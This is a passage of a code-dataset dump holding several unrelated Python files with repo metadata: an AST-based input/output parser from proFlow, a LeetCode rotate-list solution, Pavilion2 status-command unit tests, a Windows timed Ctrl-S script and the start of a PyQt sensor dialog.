raise ProflowParsingAstError(f\"AST value type not implemented: {type(v)}\", v)\n\n\ndef parse_arg_index(i: Union[ast.Index, ast.Slice]) -> Tuple[str, ArgMap]:\n \"\"\"Parse an ast Index.\n\n If the index is a constant value it just returns it as a string.\n E.g. data[1] returns \"1\"\n\n If the index is a variable it returns the index as a reference along with the parsed index\n E.g. data[config.a] returns \"X123\" and {\"config.a\": \"X123\"}\n\n Parameters\n ----------\n i : ast.Index\n _description_\n\n Returns\n -------\n Tuple[str, dict]\n _description_\n\n Raises\n ------\n ProflowParsingAstError\n _description_\n\n \"\"\"\n return parse_arg(i)\n # if isinstance(i, ast.Slice):\n # [top], _additional_args_top = parse_arg(i.upper)\n # [bottom], _additional_args_bottom = parse_arg(i.lower)\n # step, _additional_args_step = parse_arg(i.step)if i.step else [None, {}]\n # out = f\"{bottom}:{top}\" + (f\":{step}\" if step else \"\")\n # out_args = {**_additional_args_top, **_additional_args_bottom, **_additional_args_step}\n # return out, out_args\n # elif isinstance(i, ast.Index):\n # if isinstance(i.value, ast.Constant):\n # return [i.value.value, {}]\n # elif isinstance(i, ast.Index):\n # return parse_arg_val(i.value)\n # else:\n # raise ProflowParsingAstError(f\"AST index type not implemented: {type(i)}\", i)\n # else:\n # raise ProflowParsingAstError(f\"AST index type not implemented: {type(i)}\", i)\n\n\ndef parse_list_comp(attr: ast.ListComp):\n additional_args = {}\n # [ELT for KEYS in GEN]\n\n # ELT\n elt_arg, _additional_args = parse_arg(attr.elt)\n additional_args = {**additional_args, **_additional_args}\n ELT_ID = \"ELT\"\n ELT = \".\".join(reversed(elt_arg))\n additional_args[ELT_ID] = ELT\n list_comp_ids = []\n for i, comprehension in enumerate(attr.generators):\n # KEYS\n # comprehension = attr.generators[0]\n key_arg, _additional_args = parse_arg(comprehension.target)\n additional_args = {**additional_args, **_additional_args}\n\n # GEN\n # assert isinstance(\n # comprehension.iter, ast.Call\n # ) and comprehension.iter.func.id == \"range\", \"Only Range comprehension is implemented\"\n gen_arg, _additional_args = parse_arg(comprehension.iter)\n additional_args = {**additional_args, **_additional_args}\n\n GEN_ID = f\"GEN_{i}\"\n for k in 
key_arg:\n additional_args[k] = GEN_ID\n\n additional_args[GEN_ID] = \".\".join(reversed(gen_arg))\n\n # for k in elt_arg:\n # additional_args[k] = \"ELT\"\n list_comp_id = f\"LIST_COMP(list_comp_{i})\" # TODO: Randomly gen id\n additional_args[list_comp_id] = f\"{ELT_ID}.{i}\"\n list_comp_ids.append(list_comp_id)\n return [\"(\" + \",\".join(list_comp_ids) + \")\"], additional_args\n\n\ndef parse_list(attr: ast.List) -> Tuple[List[str], dict]:\n out = \"\"\n for i, elt in enumerate(attr.elts):\n parsed_arg, _additional_args = parse_arg(elt)\n out = out + \".\".join(reversed([str(v) for v in parsed_arg]))\n if i != len(attr.elts) - 1:\n out = out + \",\"\n return out, _additional_args\n\n\ndef parse_fn_getattr(attr: ast.Call) -> Tuple[List[str], dict]:\n key = attr.args[0].id\n args, additional_args = parse_arg(attr.args[1])\n return [[*args, key], additional_args]\n\n\ndef parse_fn_len(attr: ast.Call) -> Tuple[List[str], dict]:\n return parse_arg(attr.args[0])\n\n\ndef parse_fn(attr: ast.Call) -> Tuple[List[str], dict]:\n arg_list = []\n additional_args = {}\n if attr.func.id == \"getattr\":\n parsed_args, _additional_args = parse_fn_getattr(attr)\n additional_args = {**additional_args, **_additional_args}\n arg_list = arg_list + parsed_args\n elif attr.func.id == \"asdict\":\n parsed_args, _additional_args = parse_arg(attr.args[0])\n additional_args = {**additional_args, **_additional_args}\n arg_list = arg_list + parsed_args\n elif attr.func.id == \"len\":\n parsed_args, _additional_args = parse_fn_len(attr)\n additional_args = {**additional_args, **_additional_args}\n arg_list = arg_list + parsed_args\n elif attr.func.id == \"lget\":\n parsed_arg_1, _additional_args = parse_arg(attr.args[1])\n additional_args = {**additional_args, **_additional_args}\n parsed_arg_0, _additional_args = parse_arg(attr.args[0])\n additional_args = {**additional_args, **_additional_args}\n arg_list = arg_list + parsed_arg_1 + parsed_arg_0\n elif attr.func.id == \"list\":\n # NOTE: We disregard that list function is called and just parse contents\n parsed_args, _additional_args = parse_arg(attr.args[0])\n additional_args = {**additional_args, **_additional_args}\n arg_list = arg_list + parsed_args\n elif attr.func.id == \"dict\":\n raise NotImplementedError(\"Dict not implemented\")\n elif attr.func.id == \"sum\":\n assert len(attr.args) == 1, \"Sum only implemented when arg length is 1\"\n parsed_arg, _additional_args = parse_arg(attr.args[0])\n additional_args = {**additional_args, **_additional_args}\n arg_list = [\"_SUM()\"] + arg_list + parsed_arg\n elif attr.func.id == \"max\":\n assert len(attr.args) == 1, \"Max only implemented when arg length is 1\"\n parsed_arg, _additional_args = parse_arg(attr.args[0])\n additional_args = {**additional_args, **_additional_args}\n arg_list = [\"_MAX()\"] + arg_list + parsed_arg\n elif attr.func.id == \"min\":\n assert len(attr.args) == 1, \"Min only implemented when arg length is 1\"\n parsed_arg, _additional_args = parse_arg(attr.args[0])\n additional_args = {**additional_args, **_additional_args}\n arg_list = [\"_MIN()\"] + arg_list + parsed_arg\n elif attr.func.id == \"range\":\n RANGE_ARG_ID = f\"RANGE_ARG_{get_id()}\"\n out = f\"{RANGE_ARG_ID}._RANGE()\"\n for i, arg in enumerate(attr.args):\n # assert len(attr.args) == 1, \"Range only implemented when arg length is 1\"\n ARG_ID = f\"{RANGE_ARG_ID}.{i}\" # TODO: Generate this\n parsed_arg, _additional_args = parse_arg(arg)\n additional_args = {**additional_args, **_additional_args}\n additional_args[ARG_ID] 
= \".\".join(reversed([str(a) for a in parsed_arg]))\n arg_list.append(out)\n elif attr.func.id == \"reversed\":\n REVERSED_ARG_ID = f\"REVERSED_ARG_{get_id()}\"\n out = f\"{REVERSED_ARG_ID}._REVERSED()\"\n for i, arg in enumerate(attr.args):\n # assert len(attr.args) == 1, \"REVERSED only implemented when arg length is 1\"\n ARG_ID = f\"{REVERSED_ARG_ID}.{i}\" # TODO: Generate this\n parsed_arg, _additional_args = parse_arg(arg)\n additional_args = {**additional_args, **_additional_args}\n additional_args[ARG_ID] = \".\".join(reversed([str(a) for a in parsed_arg]))\n arg_list.append(out)\n else:\n warnings.warn(Warning(f\"Parsing for func: {attr.func.id} has not been implemented\"))\n arg_list += [parse_arg(a) for a in attr.args]\n # TODO: Parse kwargs!\n if len(attr.keywords) > 0:\n raise NotImplementedError(\"Kwargs not implemented\")\n return arg_list, additional_args\n\n\ndef parse_arg(attr: ast.Attribute) -> Tuple[List[str], ArgMap]:\n \"\"\"Takes a parameter path such as config.a.b and recursively pulls out the string rep.\n\n E.g.\n I(config.a.foo.bar, as_='x') returns [['config', 'a', 'foo', 'bar'], None]\n I(config.a.[config.b].bar, as_='x') returns [['config', 'a', '*X', 'bar'], {\"config.b\": \"*X\"}]\n\n \"\"\"\n arg_list = []\n additional_args = {}\n if isinstance(attr, ast.Attribute):\n arg_list.append(attr.attr)\n parsed_arg, _additional_args = parse_arg(attr.value)\n additional_args = {**additional_args, **_additional_args}\n arg_list = arg_list + parsed_arg\n elif isinstance(attr, ast.Name):\n arg_list.append(attr.id)\n elif isinstance(attr, ast.Constant):\n arg_list.append(attr.value)\n elif isinstance(attr, ast.Index):\n parsed_arg, _additional_args = parse_arg_val(attr.value)\n arg_list.append(parsed_arg)\n additional_args = {**additional_args, **_additional_args}\n elif isinstance(attr, ast.Subscript):\n index, _additional_args = parse_arg_index(attr.slice)\n additional_args = {**additional_args, **_additional_args}\n arg_list = arg_list + index\n # arg_list.append(index)\n parsed_arg, _additional_args = parse_arg(attr.value)\n arg_list = arg_list + parsed_arg\n additional_args = {**additional_args, **_additional_args}\n elif isinstance(attr, ast.ListComp):\n parsed_arg, _additional_args = parse_list_comp(attr)\n arg_list = arg_list + parsed_arg\n additional_args = {**additional_args, **_additional_args}\n elif isinstance(attr, ast.BinOp):\n parsed_args, _additional_args = parse_bin_op(attr)\n arg_list = arg_list + parsed_args\n additional_args = {**additional_args, **_additional_args}\n elif isinstance(attr, ast.BoolOp):\n _addtional_args_op = {\n \"op\": attr.op.__class__.__name__,\n }\n additional_args = {**additional_args, **_addtional_args_op}\n parsed_arg_left, _additional_args = parse_arg(attr.values[0])\n additional_args = {**additional_args, **_additional_args}\n parsed_arg_right, _additional_args = parse_arg(attr.values[1])\n additional_args = {**additional_args, **_additional_args}\n lhs = '.'.join(map(str, reversed(parsed_arg_left)))\n rhs = '.'.join(map(str, reversed(parsed_arg_right)))\n arg_list.append(f\"{lhs},{rhs}\")\n elif isinstance(attr, ast.Compare):\n parsed_arg_left, _additional_args = parse_arg(attr.left)\n additional_args = {**additional_args, **_additional_args}\n lhs = '.'.join(reversed(parsed_arg_left))\n parsed_arg_comparator, _additional_args = parse_arg(attr.comparators[0])\n additional_args = {**additional_args, **_additional_args}\n # TODO: Check this handles all comparitors\n rhs = '.'.join(reversed(parsed_arg_comparator))\n 
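# flatten the comparison into a 'lhs,rhs' pair, mirroring the BinOp and BoolOp branches\n        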
arg_list.append(f\"{lhs},{rhs}\")\n elif isinstance(attr, ast.Slice):\n # TODO: Check this ok\n [top], _additional_args_top = parse_arg(attr.upper)\n [bottom], _additional_args_bottom = parse_arg(attr.lower)\n step, _additional_args_step = parse_arg(attr.step)if attr.step else [None, {}]\n index = f\"{bottom}:{top}\" + (f\":{step}\" if step else \"\")\n _additional_args = {**_additional_args_top, **\n _additional_args_bottom, **_additional_args_step}\n arg_list.append(index)\n additional_args = {**additional_args, **_additional_args}\n elif isinstance(attr, ast.Call):\n parsed_args, _additional_args = parse_fn(attr)\n arg_list = arg_list + parsed_args\n additional_args = {**additional_args, **_additional_args}\n elif isinstance(attr, ast.IfExp):\n # TODO: Implement this\n arg_list.append(\"AST PARSE NOT_IMPLEMENTED\")\n elif isinstance(attr, ast.Tuple):\n for elt in attr.elts:\n parsed_arg, _additional_args = parse_arg(elt)\n additional_args = {**additional_args, **_additional_args}\n arg_list = arg_list + parsed_arg\n\n elif isinstance(attr, ast.List): # NOTE: Not currently supported\n for elt in attr.elts:\n parsed_arg, _additional_args = parse_arg(elt)\n additional_args = {**additional_args, **_additional_args}\n arg_list = arg_list + parsed_arg\n # # TODO: Fix this\n # parsed_arg, _additional_args = parse_arg(elt)\n # arg_list.append(parse_list(attr))\n # arg_list = arg_list + parse_arg(attr.value)\n else:\n warnings.warn(\"Failed to parse args\")\n # warnings.warn(ast.dump(attr))\n raise ProflowParsingAstError(f\"AST type parse arg not implemented: {type(attr)}\", attr)\n return arg_list, additional_args\n\n\ndef parse_input_element(inp: ast.Call) -> Tuple[List[str], ArgMap]:\n \"\"\"Pull input string from an I object.\n\n E.g\n I(config.a.foo.bar, as_='x') will return \"config.a.foo.bar\".\n\n Parameters\n ----------\n inp : ast.Call\n _description_\n\n Returns\n -------\n _type_\n _description_\n \"\"\"\n if isinstance(inp, ast.Starred):\n return [], {}\n # TODO: Should throw an error!\n raise NotImplementedError(\"Starred not implemented\")\n assert inp.func.id == \"I\", \"input must be instance of a I object\"\n in_arg_tree: ast.Attribute = inp.args[0]\n args_out, additional_argmap = parse_arg(in_arg_tree)\n in_args = list(reversed(args_out))\n return in_args, additional_argmap\n\n\ndef parse_output_element(inp):\n in_args = list(reversed(parse_arg(inp)))\n return in_args\n\n\ndef parse_as_arg(v):\n if isinstance(v, ast.Constant):\n return v.value\n raise ProflowParsingAstError(f\"Value type parsing not implemented: {type(v)}\", v)\n\n\ndef parse_input_map_to_arg(inp: ast.Call) -> str:\n \"\"\"Get the _as value from an I object instance.\n\n\n E.g.\n I(config.a.foo.bar, as_='x') will return \"x\".\n\n\n Parameters\n ----------\n inp : ast.Call\n _description_\n\n Returns\n -------\n str\n _description_\n \"\"\"\n\n if isinstance(inp, ast.Starred):\n return \"\"\n # TODO: Should throw an error!\n raise NotImplementedError(\"Starred not implemented\")\n assert len(inp.keywords) >= 0 and inp.keywords[0].arg == \"as_\", \"first keyword should be as_\"\n as_arg = inp.keywords[0]\n return parse_as_arg(as_arg.value)\n\n\ndef get_inputs(input_list: ast.List) -> ArgMap:\n input_mapping = {}\n for i in input_list.elts:\n in_args, additional_mappings = parse_input_element(i)\n assert in_args is not None, \"Could not get input args!\"\n k = parse_input_map_to_arg(i)\n map_from = '.'.join(map(str, in_args))\n input_mapping[k] = map_from\n input_mapping = {**input_mapping, 
**additional_mappings}\n return input_mapping\n\n\ndef parse_output_target(out_el):\n if isinstance(out_el, ast.Constant):\n return out_el.value\n if isinstance(out_el, ast.FormattedValue):\n return f\"{{{out_el.value.id}}}\"\n elif isinstance(out_el, ast.JoinedStr):\n elts = list(map(parse_output_target, out_el.values))\n return '.'.join(elts)\n else:\n raise NotImplementedError(f\"Ast type not implemented: {type(out_el)}\")\n\n\ndef parse_output(inp: ast.Tuple) -> Tuple[str, str]:\n assert isinstance(inp, ast.Tuple)\n assert len(inp.elts) == 2, f\"Expected only 2 elements in tuple but got {len(inp.elts)}\"\n result, target = inp.elts\n result_arg = parse_output_element(result)\n out_as_arg = parse_output_target(target)\n return result_arg, out_as_arg\n\n\ndef get_outputs_from_lambda_body(input_list: ast.List):\n input_mapping = {}\n if isinstance(input_list, ast.List):\n for i in input_list.elts:\n in_args, out_as_arg = parse_output(i)\n assert in_args, \"Could not get input args!\"\n assert out_as_arg, \"Could not get input args!\"\n k = '.'.join(map(str, in_args))\n input_mapping[k] = out_as_arg\n elif isinstance(input_list, ast.ListComp):\n # For now we just treat a list comp as a single output\n in_args, out_as_arg = parse_output(input_list.elt)\n assert in_args, \"Could not get input args!\"\n assert out_as_arg, \"Could not get input args!\"\n k = '.'.join(map(str, in_args))\n input_mapping[k] = out_as_arg\n else:\n raise NotImplementedError(f\"Ast type not implemented: {type(input_list)}\")\n return input_mapping\n\n\ndef parse_inputs(\n map_inputs_fn: Callable[[any], List[I]], allow_errors: bool = True, silent=False,\n) -> dict:\n source_code = textwrap.dedent(inspect.getsource(map_inputs_fn))\n ast_tree = ast.parse(source_code)\n if source_code[0:5] == \"field\":\n return {} # input function is not set\n try:\n inputs_list = get_inputs_list(ast_tree.body[0])\n inputs_map = get_inputs(inputs_list)\n return inputs_map\n except ProflowParsingError as e:\n if not silent:\n print(\"ProFlowParsingError\\n==================\")\n print(e)\n if not allow_errors:\n raise e from e\n else:\n\n return {}\n except ProflowParsingLineError as e:\n if not silent:\n print(\"ProFlowParsingLineError\\n==================\")\n print(e)\n if not allow_errors:\n raise e from e\n else:\n return {}\n except ProflowParsingAstError as e:\n if not silent:\n print(\"ProFlowParsingAstError\\n==================\")\n print(e)\n if not allow_errors:\n raise e from e\n else:\n return {}\n except Exception as e:\n if not allow_errors:\n print(\"ProFlowParsingFunctionError\\n==================\")\n print(source_code)\n print(\"============\")\n print(ast.dump(ast_tree))\n print(\"==========end====\")\n raise e from e\n print(\"ProFlowParsingFunctionError\\n==================\")\n print(e)\n print(ast.dump(ast_tree))\n raise ProflowParsingFunctionError(\n \"Failed to get inputs for source\", map_inputs_fn) from e\n else:\n # raise e\n # return str(e)\n # print(e)\n return \"FAILED_TO_PARSE_PROCESS\"\n\n\ndef parse_outputs_b(map_inputs_fn: Callable[[any], List[I]]) -> dict:\n source_code = textwrap.dedent(inspect.getsource(map_inputs_fn))\n try:\n ast_tree = ast.parse(source_code)\n inputs_list = get_inputs_list(ast_tree.body[0])\n inputs_map = get_outputs_from_lambda_body(inputs_list)\n return inputs_map\n except Exception as e:\n raise e from e\n\n\ndef parse_outputs(\n map_outputs_fn: Callable[[any], List[I]], allow_errors: bool = True, silent=True,\n) -> dict:\n try:\n output_lines = 
parse_outputs_to_interface(map_outputs_fn, allow_errors)\n        outputs_map = {\n            parse_key(i.from_): f'{rm_inv_comma(i.as_.strip())}'\n            for i in output_lines}\n        return outputs_map\n    except Exception as e:\n        if not silent:\n            warnings.warn(\"Error parsing outputs\")\n            warnings.warn(inspect.getsource(map_outputs_fn))\n        if not allow_errors:\n            raise e from e\n        else:\n            return \"UNKNOWN\"\n\n\ndef fieldNotEmpty(f: Union[any, Callable]) -> bool:\n    return f and callable(f)\n\n\ndef inspect_process(process: 'Process'):\n    Parsed = namedtuple(\n        'Parsed', 'config_inputs state_inputs parameter_inputs additional_inputs state_outputs')\n    try:\n        return Parsed(\n            config_inputs=fieldNotEmpty(\n                process.config_inputs) and parse_inputs(process.config_inputs),\n            state_inputs=fieldNotEmpty(process.state_inputs) and parse_inputs(process.state_inputs),\n            parameter_inputs=fieldNotEmpty(\n                process.state_inputs) and parse_inputs(process.state_inputs),\n            additional_inputs=fieldNotEmpty(\n                process.additional_inputs) and parse_inputs(process.additional_inputs),\n            state_outputs=fieldNotEmpty(\n                process.state_outputs) and parse_outputs(process.state_outputs),\n        )\n    except Exception as e:\n        raise ProflowParsingError(str(e), process)\n\n\ndef inspect_process_to_interfaces(process: 'Process'):\n    Parsed = namedtuple(\n        'Parsed', 'config_inputs state_inputs parameter_inputs additional_inputs state_outputs')\n    try:\n        return Parsed(\n            config_inputs=fieldNotEmpty(\n                process.config_inputs) and parse_inputs_to_interface(process.config_inputs),\n            state_inputs=fieldNotEmpty(\n                process.state_inputs) and parse_inputs_to_interface(process.state_inputs),\n            parameter_inputs=fieldNotEmpty(\n                process.state_inputs) and parse_inputs_to_interface(process.state_inputs),\n            additional_inputs=fieldNotEmpty(\n                process.additional_inputs) and parse_inputs_to_interface(process.additional_inputs),\n            state_outputs=fieldNotEmpty(\n                process.state_outputs) and parse_outputs_to_interface(process.state_outputs),\n        )\n    except Exception as e:\n        raise ProflowParsingError(str(e), process)\n","repo_name":"sbland/proFlow","sub_path":"proflow/process_inspector.py","file_name":"process_inspector.py","file_ext":"py","file_size_in_byte":29980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43231609340","text":"#!/usr/bin/env python\n# encoding: utf-8\n'''\n@author: kafkal\n@contact: 1051748335@qq.com\n@software: pycharm\n@file: 61.py\n@time: 2019/2/15 015 12:55\n@desc:\nGiven a linked list, rotate the list to the right by k places, where k is non-negative.\n\nExample 1:\n\nInput: 1->2->3->4->5->NULL, k = 2\nOutput: 4->5->1->2->3->NULL\nExplanation:\nRotate right 1 step: 5->1->2->3->4->NULL\nRotate right 2 steps: 4->5->1->2->3->NULL\nExample 2:\n\nInput: 0->1->2->NULL, k = 4\nOutput: 2->0->1->NULL\nExplanation:\nRotate right 1 step: 2->0->1->NULL\nRotate right 2 steps: 1->2->0->NULL\nRotate right 3 steps: 0->1->2->NULL\nRotate right 4 steps: 2->0->1->NULL\n'''\nclass ListNode:\n    def __init__(self, x):\n        self.val = x\n        self.next = None\n\ndef rotateRight(head, k):\n    \"\"\"\n    :type head: ListNode\n    :type k: int\n    :rtype: ListNode\n    \"\"\"\n    count = 1\n    cur = head\n    if head == None:\n        return None\n    while cur.next != None:\n        count+=1\n        cur = cur.next\n    if count==1:\n        return head\n    k = k % count\n    if k == 0:\n        return head\n    cur = head\n    for i in range(count-k-1):\n        cur = cur.next\n    head_now = cur.next\n    cur.next = None\n    cur = head_now\n    while cur.next != None:\n        cur = cur.next\n    cur.next = head\n    return head_now\n\nl0 = ListNode(0)\nl1 = ListNode(1)\nl2 = ListNode(2)\nl3 = ListNode(3)\nl4 = ListNode(4)\nl5 = ListNode(5)\n# l0.next=l1\nl1.next=l2\n# l2.next=l3\n# 
l3.next=l4\n# l4.next=l5\ncur = rotateRight(l1,2)\ns = ''\nwhile cur.next!=None:\n s += (str(cur.val)+'->')\n cur=cur.next\ns += (str(cur.val))\nprint(s)","repo_name":"kafkalm/LeetCode","sub_path":"LeetCode/61.py","file_name":"61.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11578204581","text":"import argparse\nimport io\nimport time\n\nfrom pavilion import commands\nfrom pavilion import plugins\nfrom pavilion import schedulers\nfrom pavilion import status_file\nfrom pavilion.series.series import TestSeries\nfrom pavilion.test_config import file_format\nfrom pavilion.unittest import PavTestCase\n\n\nclass StatusCmdTests(PavTestCase):\n\n def setUp(self):\n plugins.initialize_plugins(self.pav_cfg)\n\n def tearDown(self):\n plugins._reset_plugins()\n\n def test_status_arguments(self):\n status_cmd = commands.get_command('status')\n\n parser = argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n args = parser.parse_args(['test1', 'test2'])\n\n self.assertEqual(args.tests[0], 'test1')\n self.assertEqual(args.tests[1], 'test2')\n self.assertEqual(args.json, False)\n\n parser = argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n args = parser.parse_args(['-j', 'test0', 'test9'])\n\n self.assertEqual(args.tests[0], 'test0')\n self.assertEqual(args.tests[1], 'test9')\n self.assertEqual(args.json, True)\n\n def test_status_command(self):\n \"\"\"Test status command by generating a suite of tests.\"\"\"\n\n config1 = file_format.TestConfigLoader().validate({\n 'scheduler': 'raw',\n 'cfg_label': 'test',\n 'run': {\n 'env': {\n 'foo': 'bar',\n },\n 'cmds': ['echo \"I $foo, punks\"'],\n },\n })\n\n config1['name'] = 'run_test0'\n\n config2 = file_format.TestConfigLoader().validate({\n 'scheduler': 'raw',\n 'cfg_label': 'test',\n 'run': {\n 'env': {\n 'too': 'tar',\n },\n 'cmds': ['echo \"I $too, punks\"'],\n },\n })\n\n config2['name'] = 'run_test1'\n\n config3 = file_format.TestConfigLoader().validate({\n 'scheduler': 'raw',\n 'cfg_label': 'test',\n 'run': {\n 'env': {\n 'too': 'tar',\n },\n 'cmds': ['sleep 10'],\n },\n })\n\n config3['name'] = 'run_test2'\n\n configs = [config1, config2, config3]\n\n tests = [self._quick_test(cfg) for cfg in configs]\n\n for test in tests:\n test.RUN_SILENT_TIMEOUT = 1\n\n # Make sure this doesn't explode\n series = TestSeries(self.pav_cfg, None)\n for test in tests:\n series._add_test('test', test)\n test_str = \" \".join([test.full_id for test in series.tests.values()])\n\n status_cmd = commands.get_command('status')\n status_cmd.outfile = io.StringIO()\n\n # Testing for individual tests with json output\n for test in series.tests.values():\n parser = argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n arg_list = ['-j', test.full_id]\n args = parser.parse_args(arg_list)\n self.assertEqual(status_cmd.run(self.pav_cfg, args), 0)\n\n # Testing for multiple tests with json output\n parser = argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n arg_list = ['-j'] + test_str.split()\n args = parser.parse_args(arg_list)\n self.assertEqual(status_cmd.run(self.pav_cfg, args), 0)\n\n # Testing for individual tests with tabular output\n for test in series.tests.values():\n parser = argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n args = parser.parse_args([test.full_id])\n self.assertEqual(status_cmd.run(self.pav_cfg, args), 0)\n\n # Testing for multiple tests with tabular output\n parser = 
argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n arg_list = test_str.split()\n args = parser.parse_args(arg_list)\n self.assertEqual(status_cmd.run(self.pav_cfg, args), 0)\n\n def test_set_status_command(self):\n \"\"\"Test set status command by generating a suite of tests.\"\"\"\n\n config1 = file_format.TestConfigLoader().validate({\n 'scheduler': 'raw',\n 'cfg_label': 'test',\n 'run': {\n 'env': {\n 'foo': 'bar',\n },\n 'cmds': ['echo \"I $foo, punks\"'],\n },\n })\n\n config1['name'] = 'run_test0'\n\n config2 = file_format.TestConfigLoader().validate({\n 'scheduler': 'raw',\n 'cfg_label': 'test',\n 'run': {\n 'env': {\n 'too': 'tar',\n },\n 'cmds': ['echo \"I $too, punks\"'],\n },\n })\n\n config2['name'] = 'run_test1'\n\n config3 = file_format.TestConfigLoader().validate({\n 'scheduler': 'raw',\n 'cfg_label': 'test',\n 'run': {\n 'env': {\n 'too': 'tar',\n },\n 'cmds': ['sleep 10'],\n },\n })\n\n config3['name'] = 'run_test2'\n\n configs = [config1, config2, config3]\n\n tests = [self._quick_test(cfg) for cfg in configs]\n\n for test in tests:\n test.RUN_SILENT_TIMEOUT = 1\n\n set_status_cmd = commands.get_command('set_status')\n set_status_cmd.outfile = io.StringIO()\n\n # Testing for individual tests with json output\n for test in tests:\n start_status = test.status.current()\n parser = argparse.ArgumentParser()\n set_status_cmd._setup_arguments(parser)\n arg_list = ['-s', 'RUN_USER', '-n', 'tacos are delicious', test.full_id]\n args = parser.parse_args(arg_list)\n self.assertEqual(set_status_cmd.run(self.pav_cfg, args), 0,\n \"Invalid run return for test {}\".format(test.full_id))\n end_status = test.status.current()\n\n self.assertNotEqual(end_status.state, start_status.state)\n self.assertNotEqual(end_status.note, start_status.note)\n self.assertEqual(end_status.state, 'RUN_USER')\n self.assertEqual(end_status.note, 'tacos are delicious')\n\n def test_status_command_with_sched(self):\n \"\"\"Test status command when test is 'SCHEDULED'.\"\"\"\n\n cfg = file_format.TestConfigLoader().validate({\n 'scheduler': 'raw',\n 'run': {\n 'env': {\n 'foo': 'bar',\n },\n 'cmds': ['sleep 1'],\n },\n })\n\n cfg['name'] = 'testytest'\n\n test = self._quick_test(cfg, build=False, finalize=False)\n\n test.build()\n sched = schedulers.get_plugin(test.scheduler)\n sched.schedule_tests(self.pav_cfg, [test])\n\n status_cmd = commands.get_command('status')\n status_cmd.silence()\n\n parser = argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n args = parser.parse_args(['test.' 
+ str(test.id)])\n test.status.set(status_file.STATES.SCHEDULED, \"faker\")\n self.assertEqual(status_cmd.run(self.pav_cfg, args), 0,\n msg=status_cmd.clear_output())\n\n parser = argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n args = parser.parse_args(['-j', 'test.{}'.format(test.id)])\n test.status.set(status_file.STATES.SCHEDULED, \"faker\")\n self.assertEqual(status_cmd.run(self.pav_cfg, args), 0)\n\n # TODO: Test that the above have actually been set.\n\n def test_status_summary(self):\n # Testing that status works with summary flag\n status_cmd = commands.get_command('status')\n status_cmd.silence()\n parser = argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n arg_list = ['-s']\n args = parser.parse_args(arg_list)\n\n # Test that an empty working_dir fails correctly\n self.assertEqual(status_cmd.run(self.pav_cfg, args), 0)\n\n base_cfg = self._quick_test_cfg()\n test_cfg1 = base_cfg.copy()\n test_cfg1['name'] = 'test1'\n test_cfg2 = base_cfg.copy()\n test_cfg2['name'] = 'test2'\n test_cfg3 = base_cfg.copy()\n test_cfg3['name'] = 'test3'\n\n configs = [test_cfg1, test_cfg2, test_cfg3]\n tests = [self._quick_test(cfg) for cfg in configs]\n for test in tests:\n test.RUN_SILENT_TIMEOUT = 1\n\n # Testing that summary flags return correctly\n self.assertEqual(status_cmd.run(self.pav_cfg, args), 0)\n\n def test_status_history(self):\n # Testing that status works with history flag\n status_cmd = commands.get_command('status')\n out = io.StringIO()\n status_cmd.outfile = out\n\n parser = argparse.ArgumentParser()\n status_cmd._setup_arguments(parser)\n\n test = self._quick_test()\n raw = schedulers.get_plugin('raw')\n raw.schedule_tests(self.pav_cfg, [test])\n end = time.time() + 5\n while not test.complete and time.time() < end:\n time.sleep(.1)\n\n args = parser.parse_args(['--history', 'test.{}'.format(test.id)])\n self.assertEqual(status_cmd.run(self.pav_cfg, args), 0)\n\n out.seek(0)\n output = out.readlines()[4:]\n statuses = test.status.history()\n self.assertEqual(len(output), len(statuses), msg='output: {}, statuses: {}'\n .format(output, statuses))\n for i in range(len(output)):\n self.assertTrue(statuses[i].state in output[i])\n","repo_name":"hpc/pavilion2","sub_path":"test/tests/status_cmd_tests.py","file_name":"status_cmd_tests.py","file_ext":"py","file_size_in_byte":9583,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"3"} +{"seq_id":"23522391003","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nScript for pressing hotkeys to save (Ctrl-S) with time interval in given seconds\r\n(!) 
It works only on Windows OS\r\n\r\n@author: volom\r\n\"\"\"\r\nimport time\r\nimport win32com.client\r\nshell = win32com.client.Dispatch(\"WScript.Shell\")\r\nsleep_time = int(input(\"Put time interval to save (seconds)\"))\r\nwhile True:\r\n shell.SendKeys('^s')\r\n time.sleep(sleep_time)\r\n print(\"SAVED\")\r\n \r\n \r\n ","repo_name":"volom/Office_Toolkit","sub_path":"hotkeys_save.py","file_name":"hotkeys_save.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"32074756259","text":"from PyQt5.QtWidgets import QDialog\n\nfrom constants import SENSOR_ID_ROW, SENSOR_ID_COLUMN, SENSOR_ID_REGEX\nfrom controllers.sensor_controller import SensorController\nfrom gui.designer.new_sensor_model_sensor_id import Ui_Dialog\nfrom gui.dialogs.new_sensor_model_col_names_dialog import SensorModelColumnNamesDialog\n\n\nclass SensorModelIdDialog(QDialog, Ui_Dialog):\n\n def __init__(self, sensor_controller: SensorController, model: {}, model_id=None, test_file=None, parent=None):\n super().__init__()\n self.setupUi(self)\n self.sensor_controller = sensor_controller\n self.model_id = model_id\n self.test_file = test_file\n self.parent = parent\n\n self.model = model\n self.fill_existing_data()\n\n self.pushButton_previous.pressed.connect(self.open_previous_dialog)\n self.pushButton_next.pressed.connect(self.open_next_dialog)\n\n def fill_existing_data(self):\n if self.model[SENSOR_ID_ROW] is not None and self.model[SENSOR_ID_ROW] != -1:\n self.groupBox_sensor_id.setChecked(True)\n self.spinBox_row.setValue(self.model[SENSOR_ID_ROW] + 1)\n else:\n self.groupBox_sensor_id.setChecked(False)\n\n if self.model[SENSOR_ID_COLUMN] is not None and self.model[SENSOR_ID_COLUMN] != -1:\n self.checkBox_column.setChecked(True)\n self.spinBox_column.setValue(self.model[SENSOR_ID_COLUMN] + 1)\n else:\n self.checkBox_column.setChecked(False)\n\n if 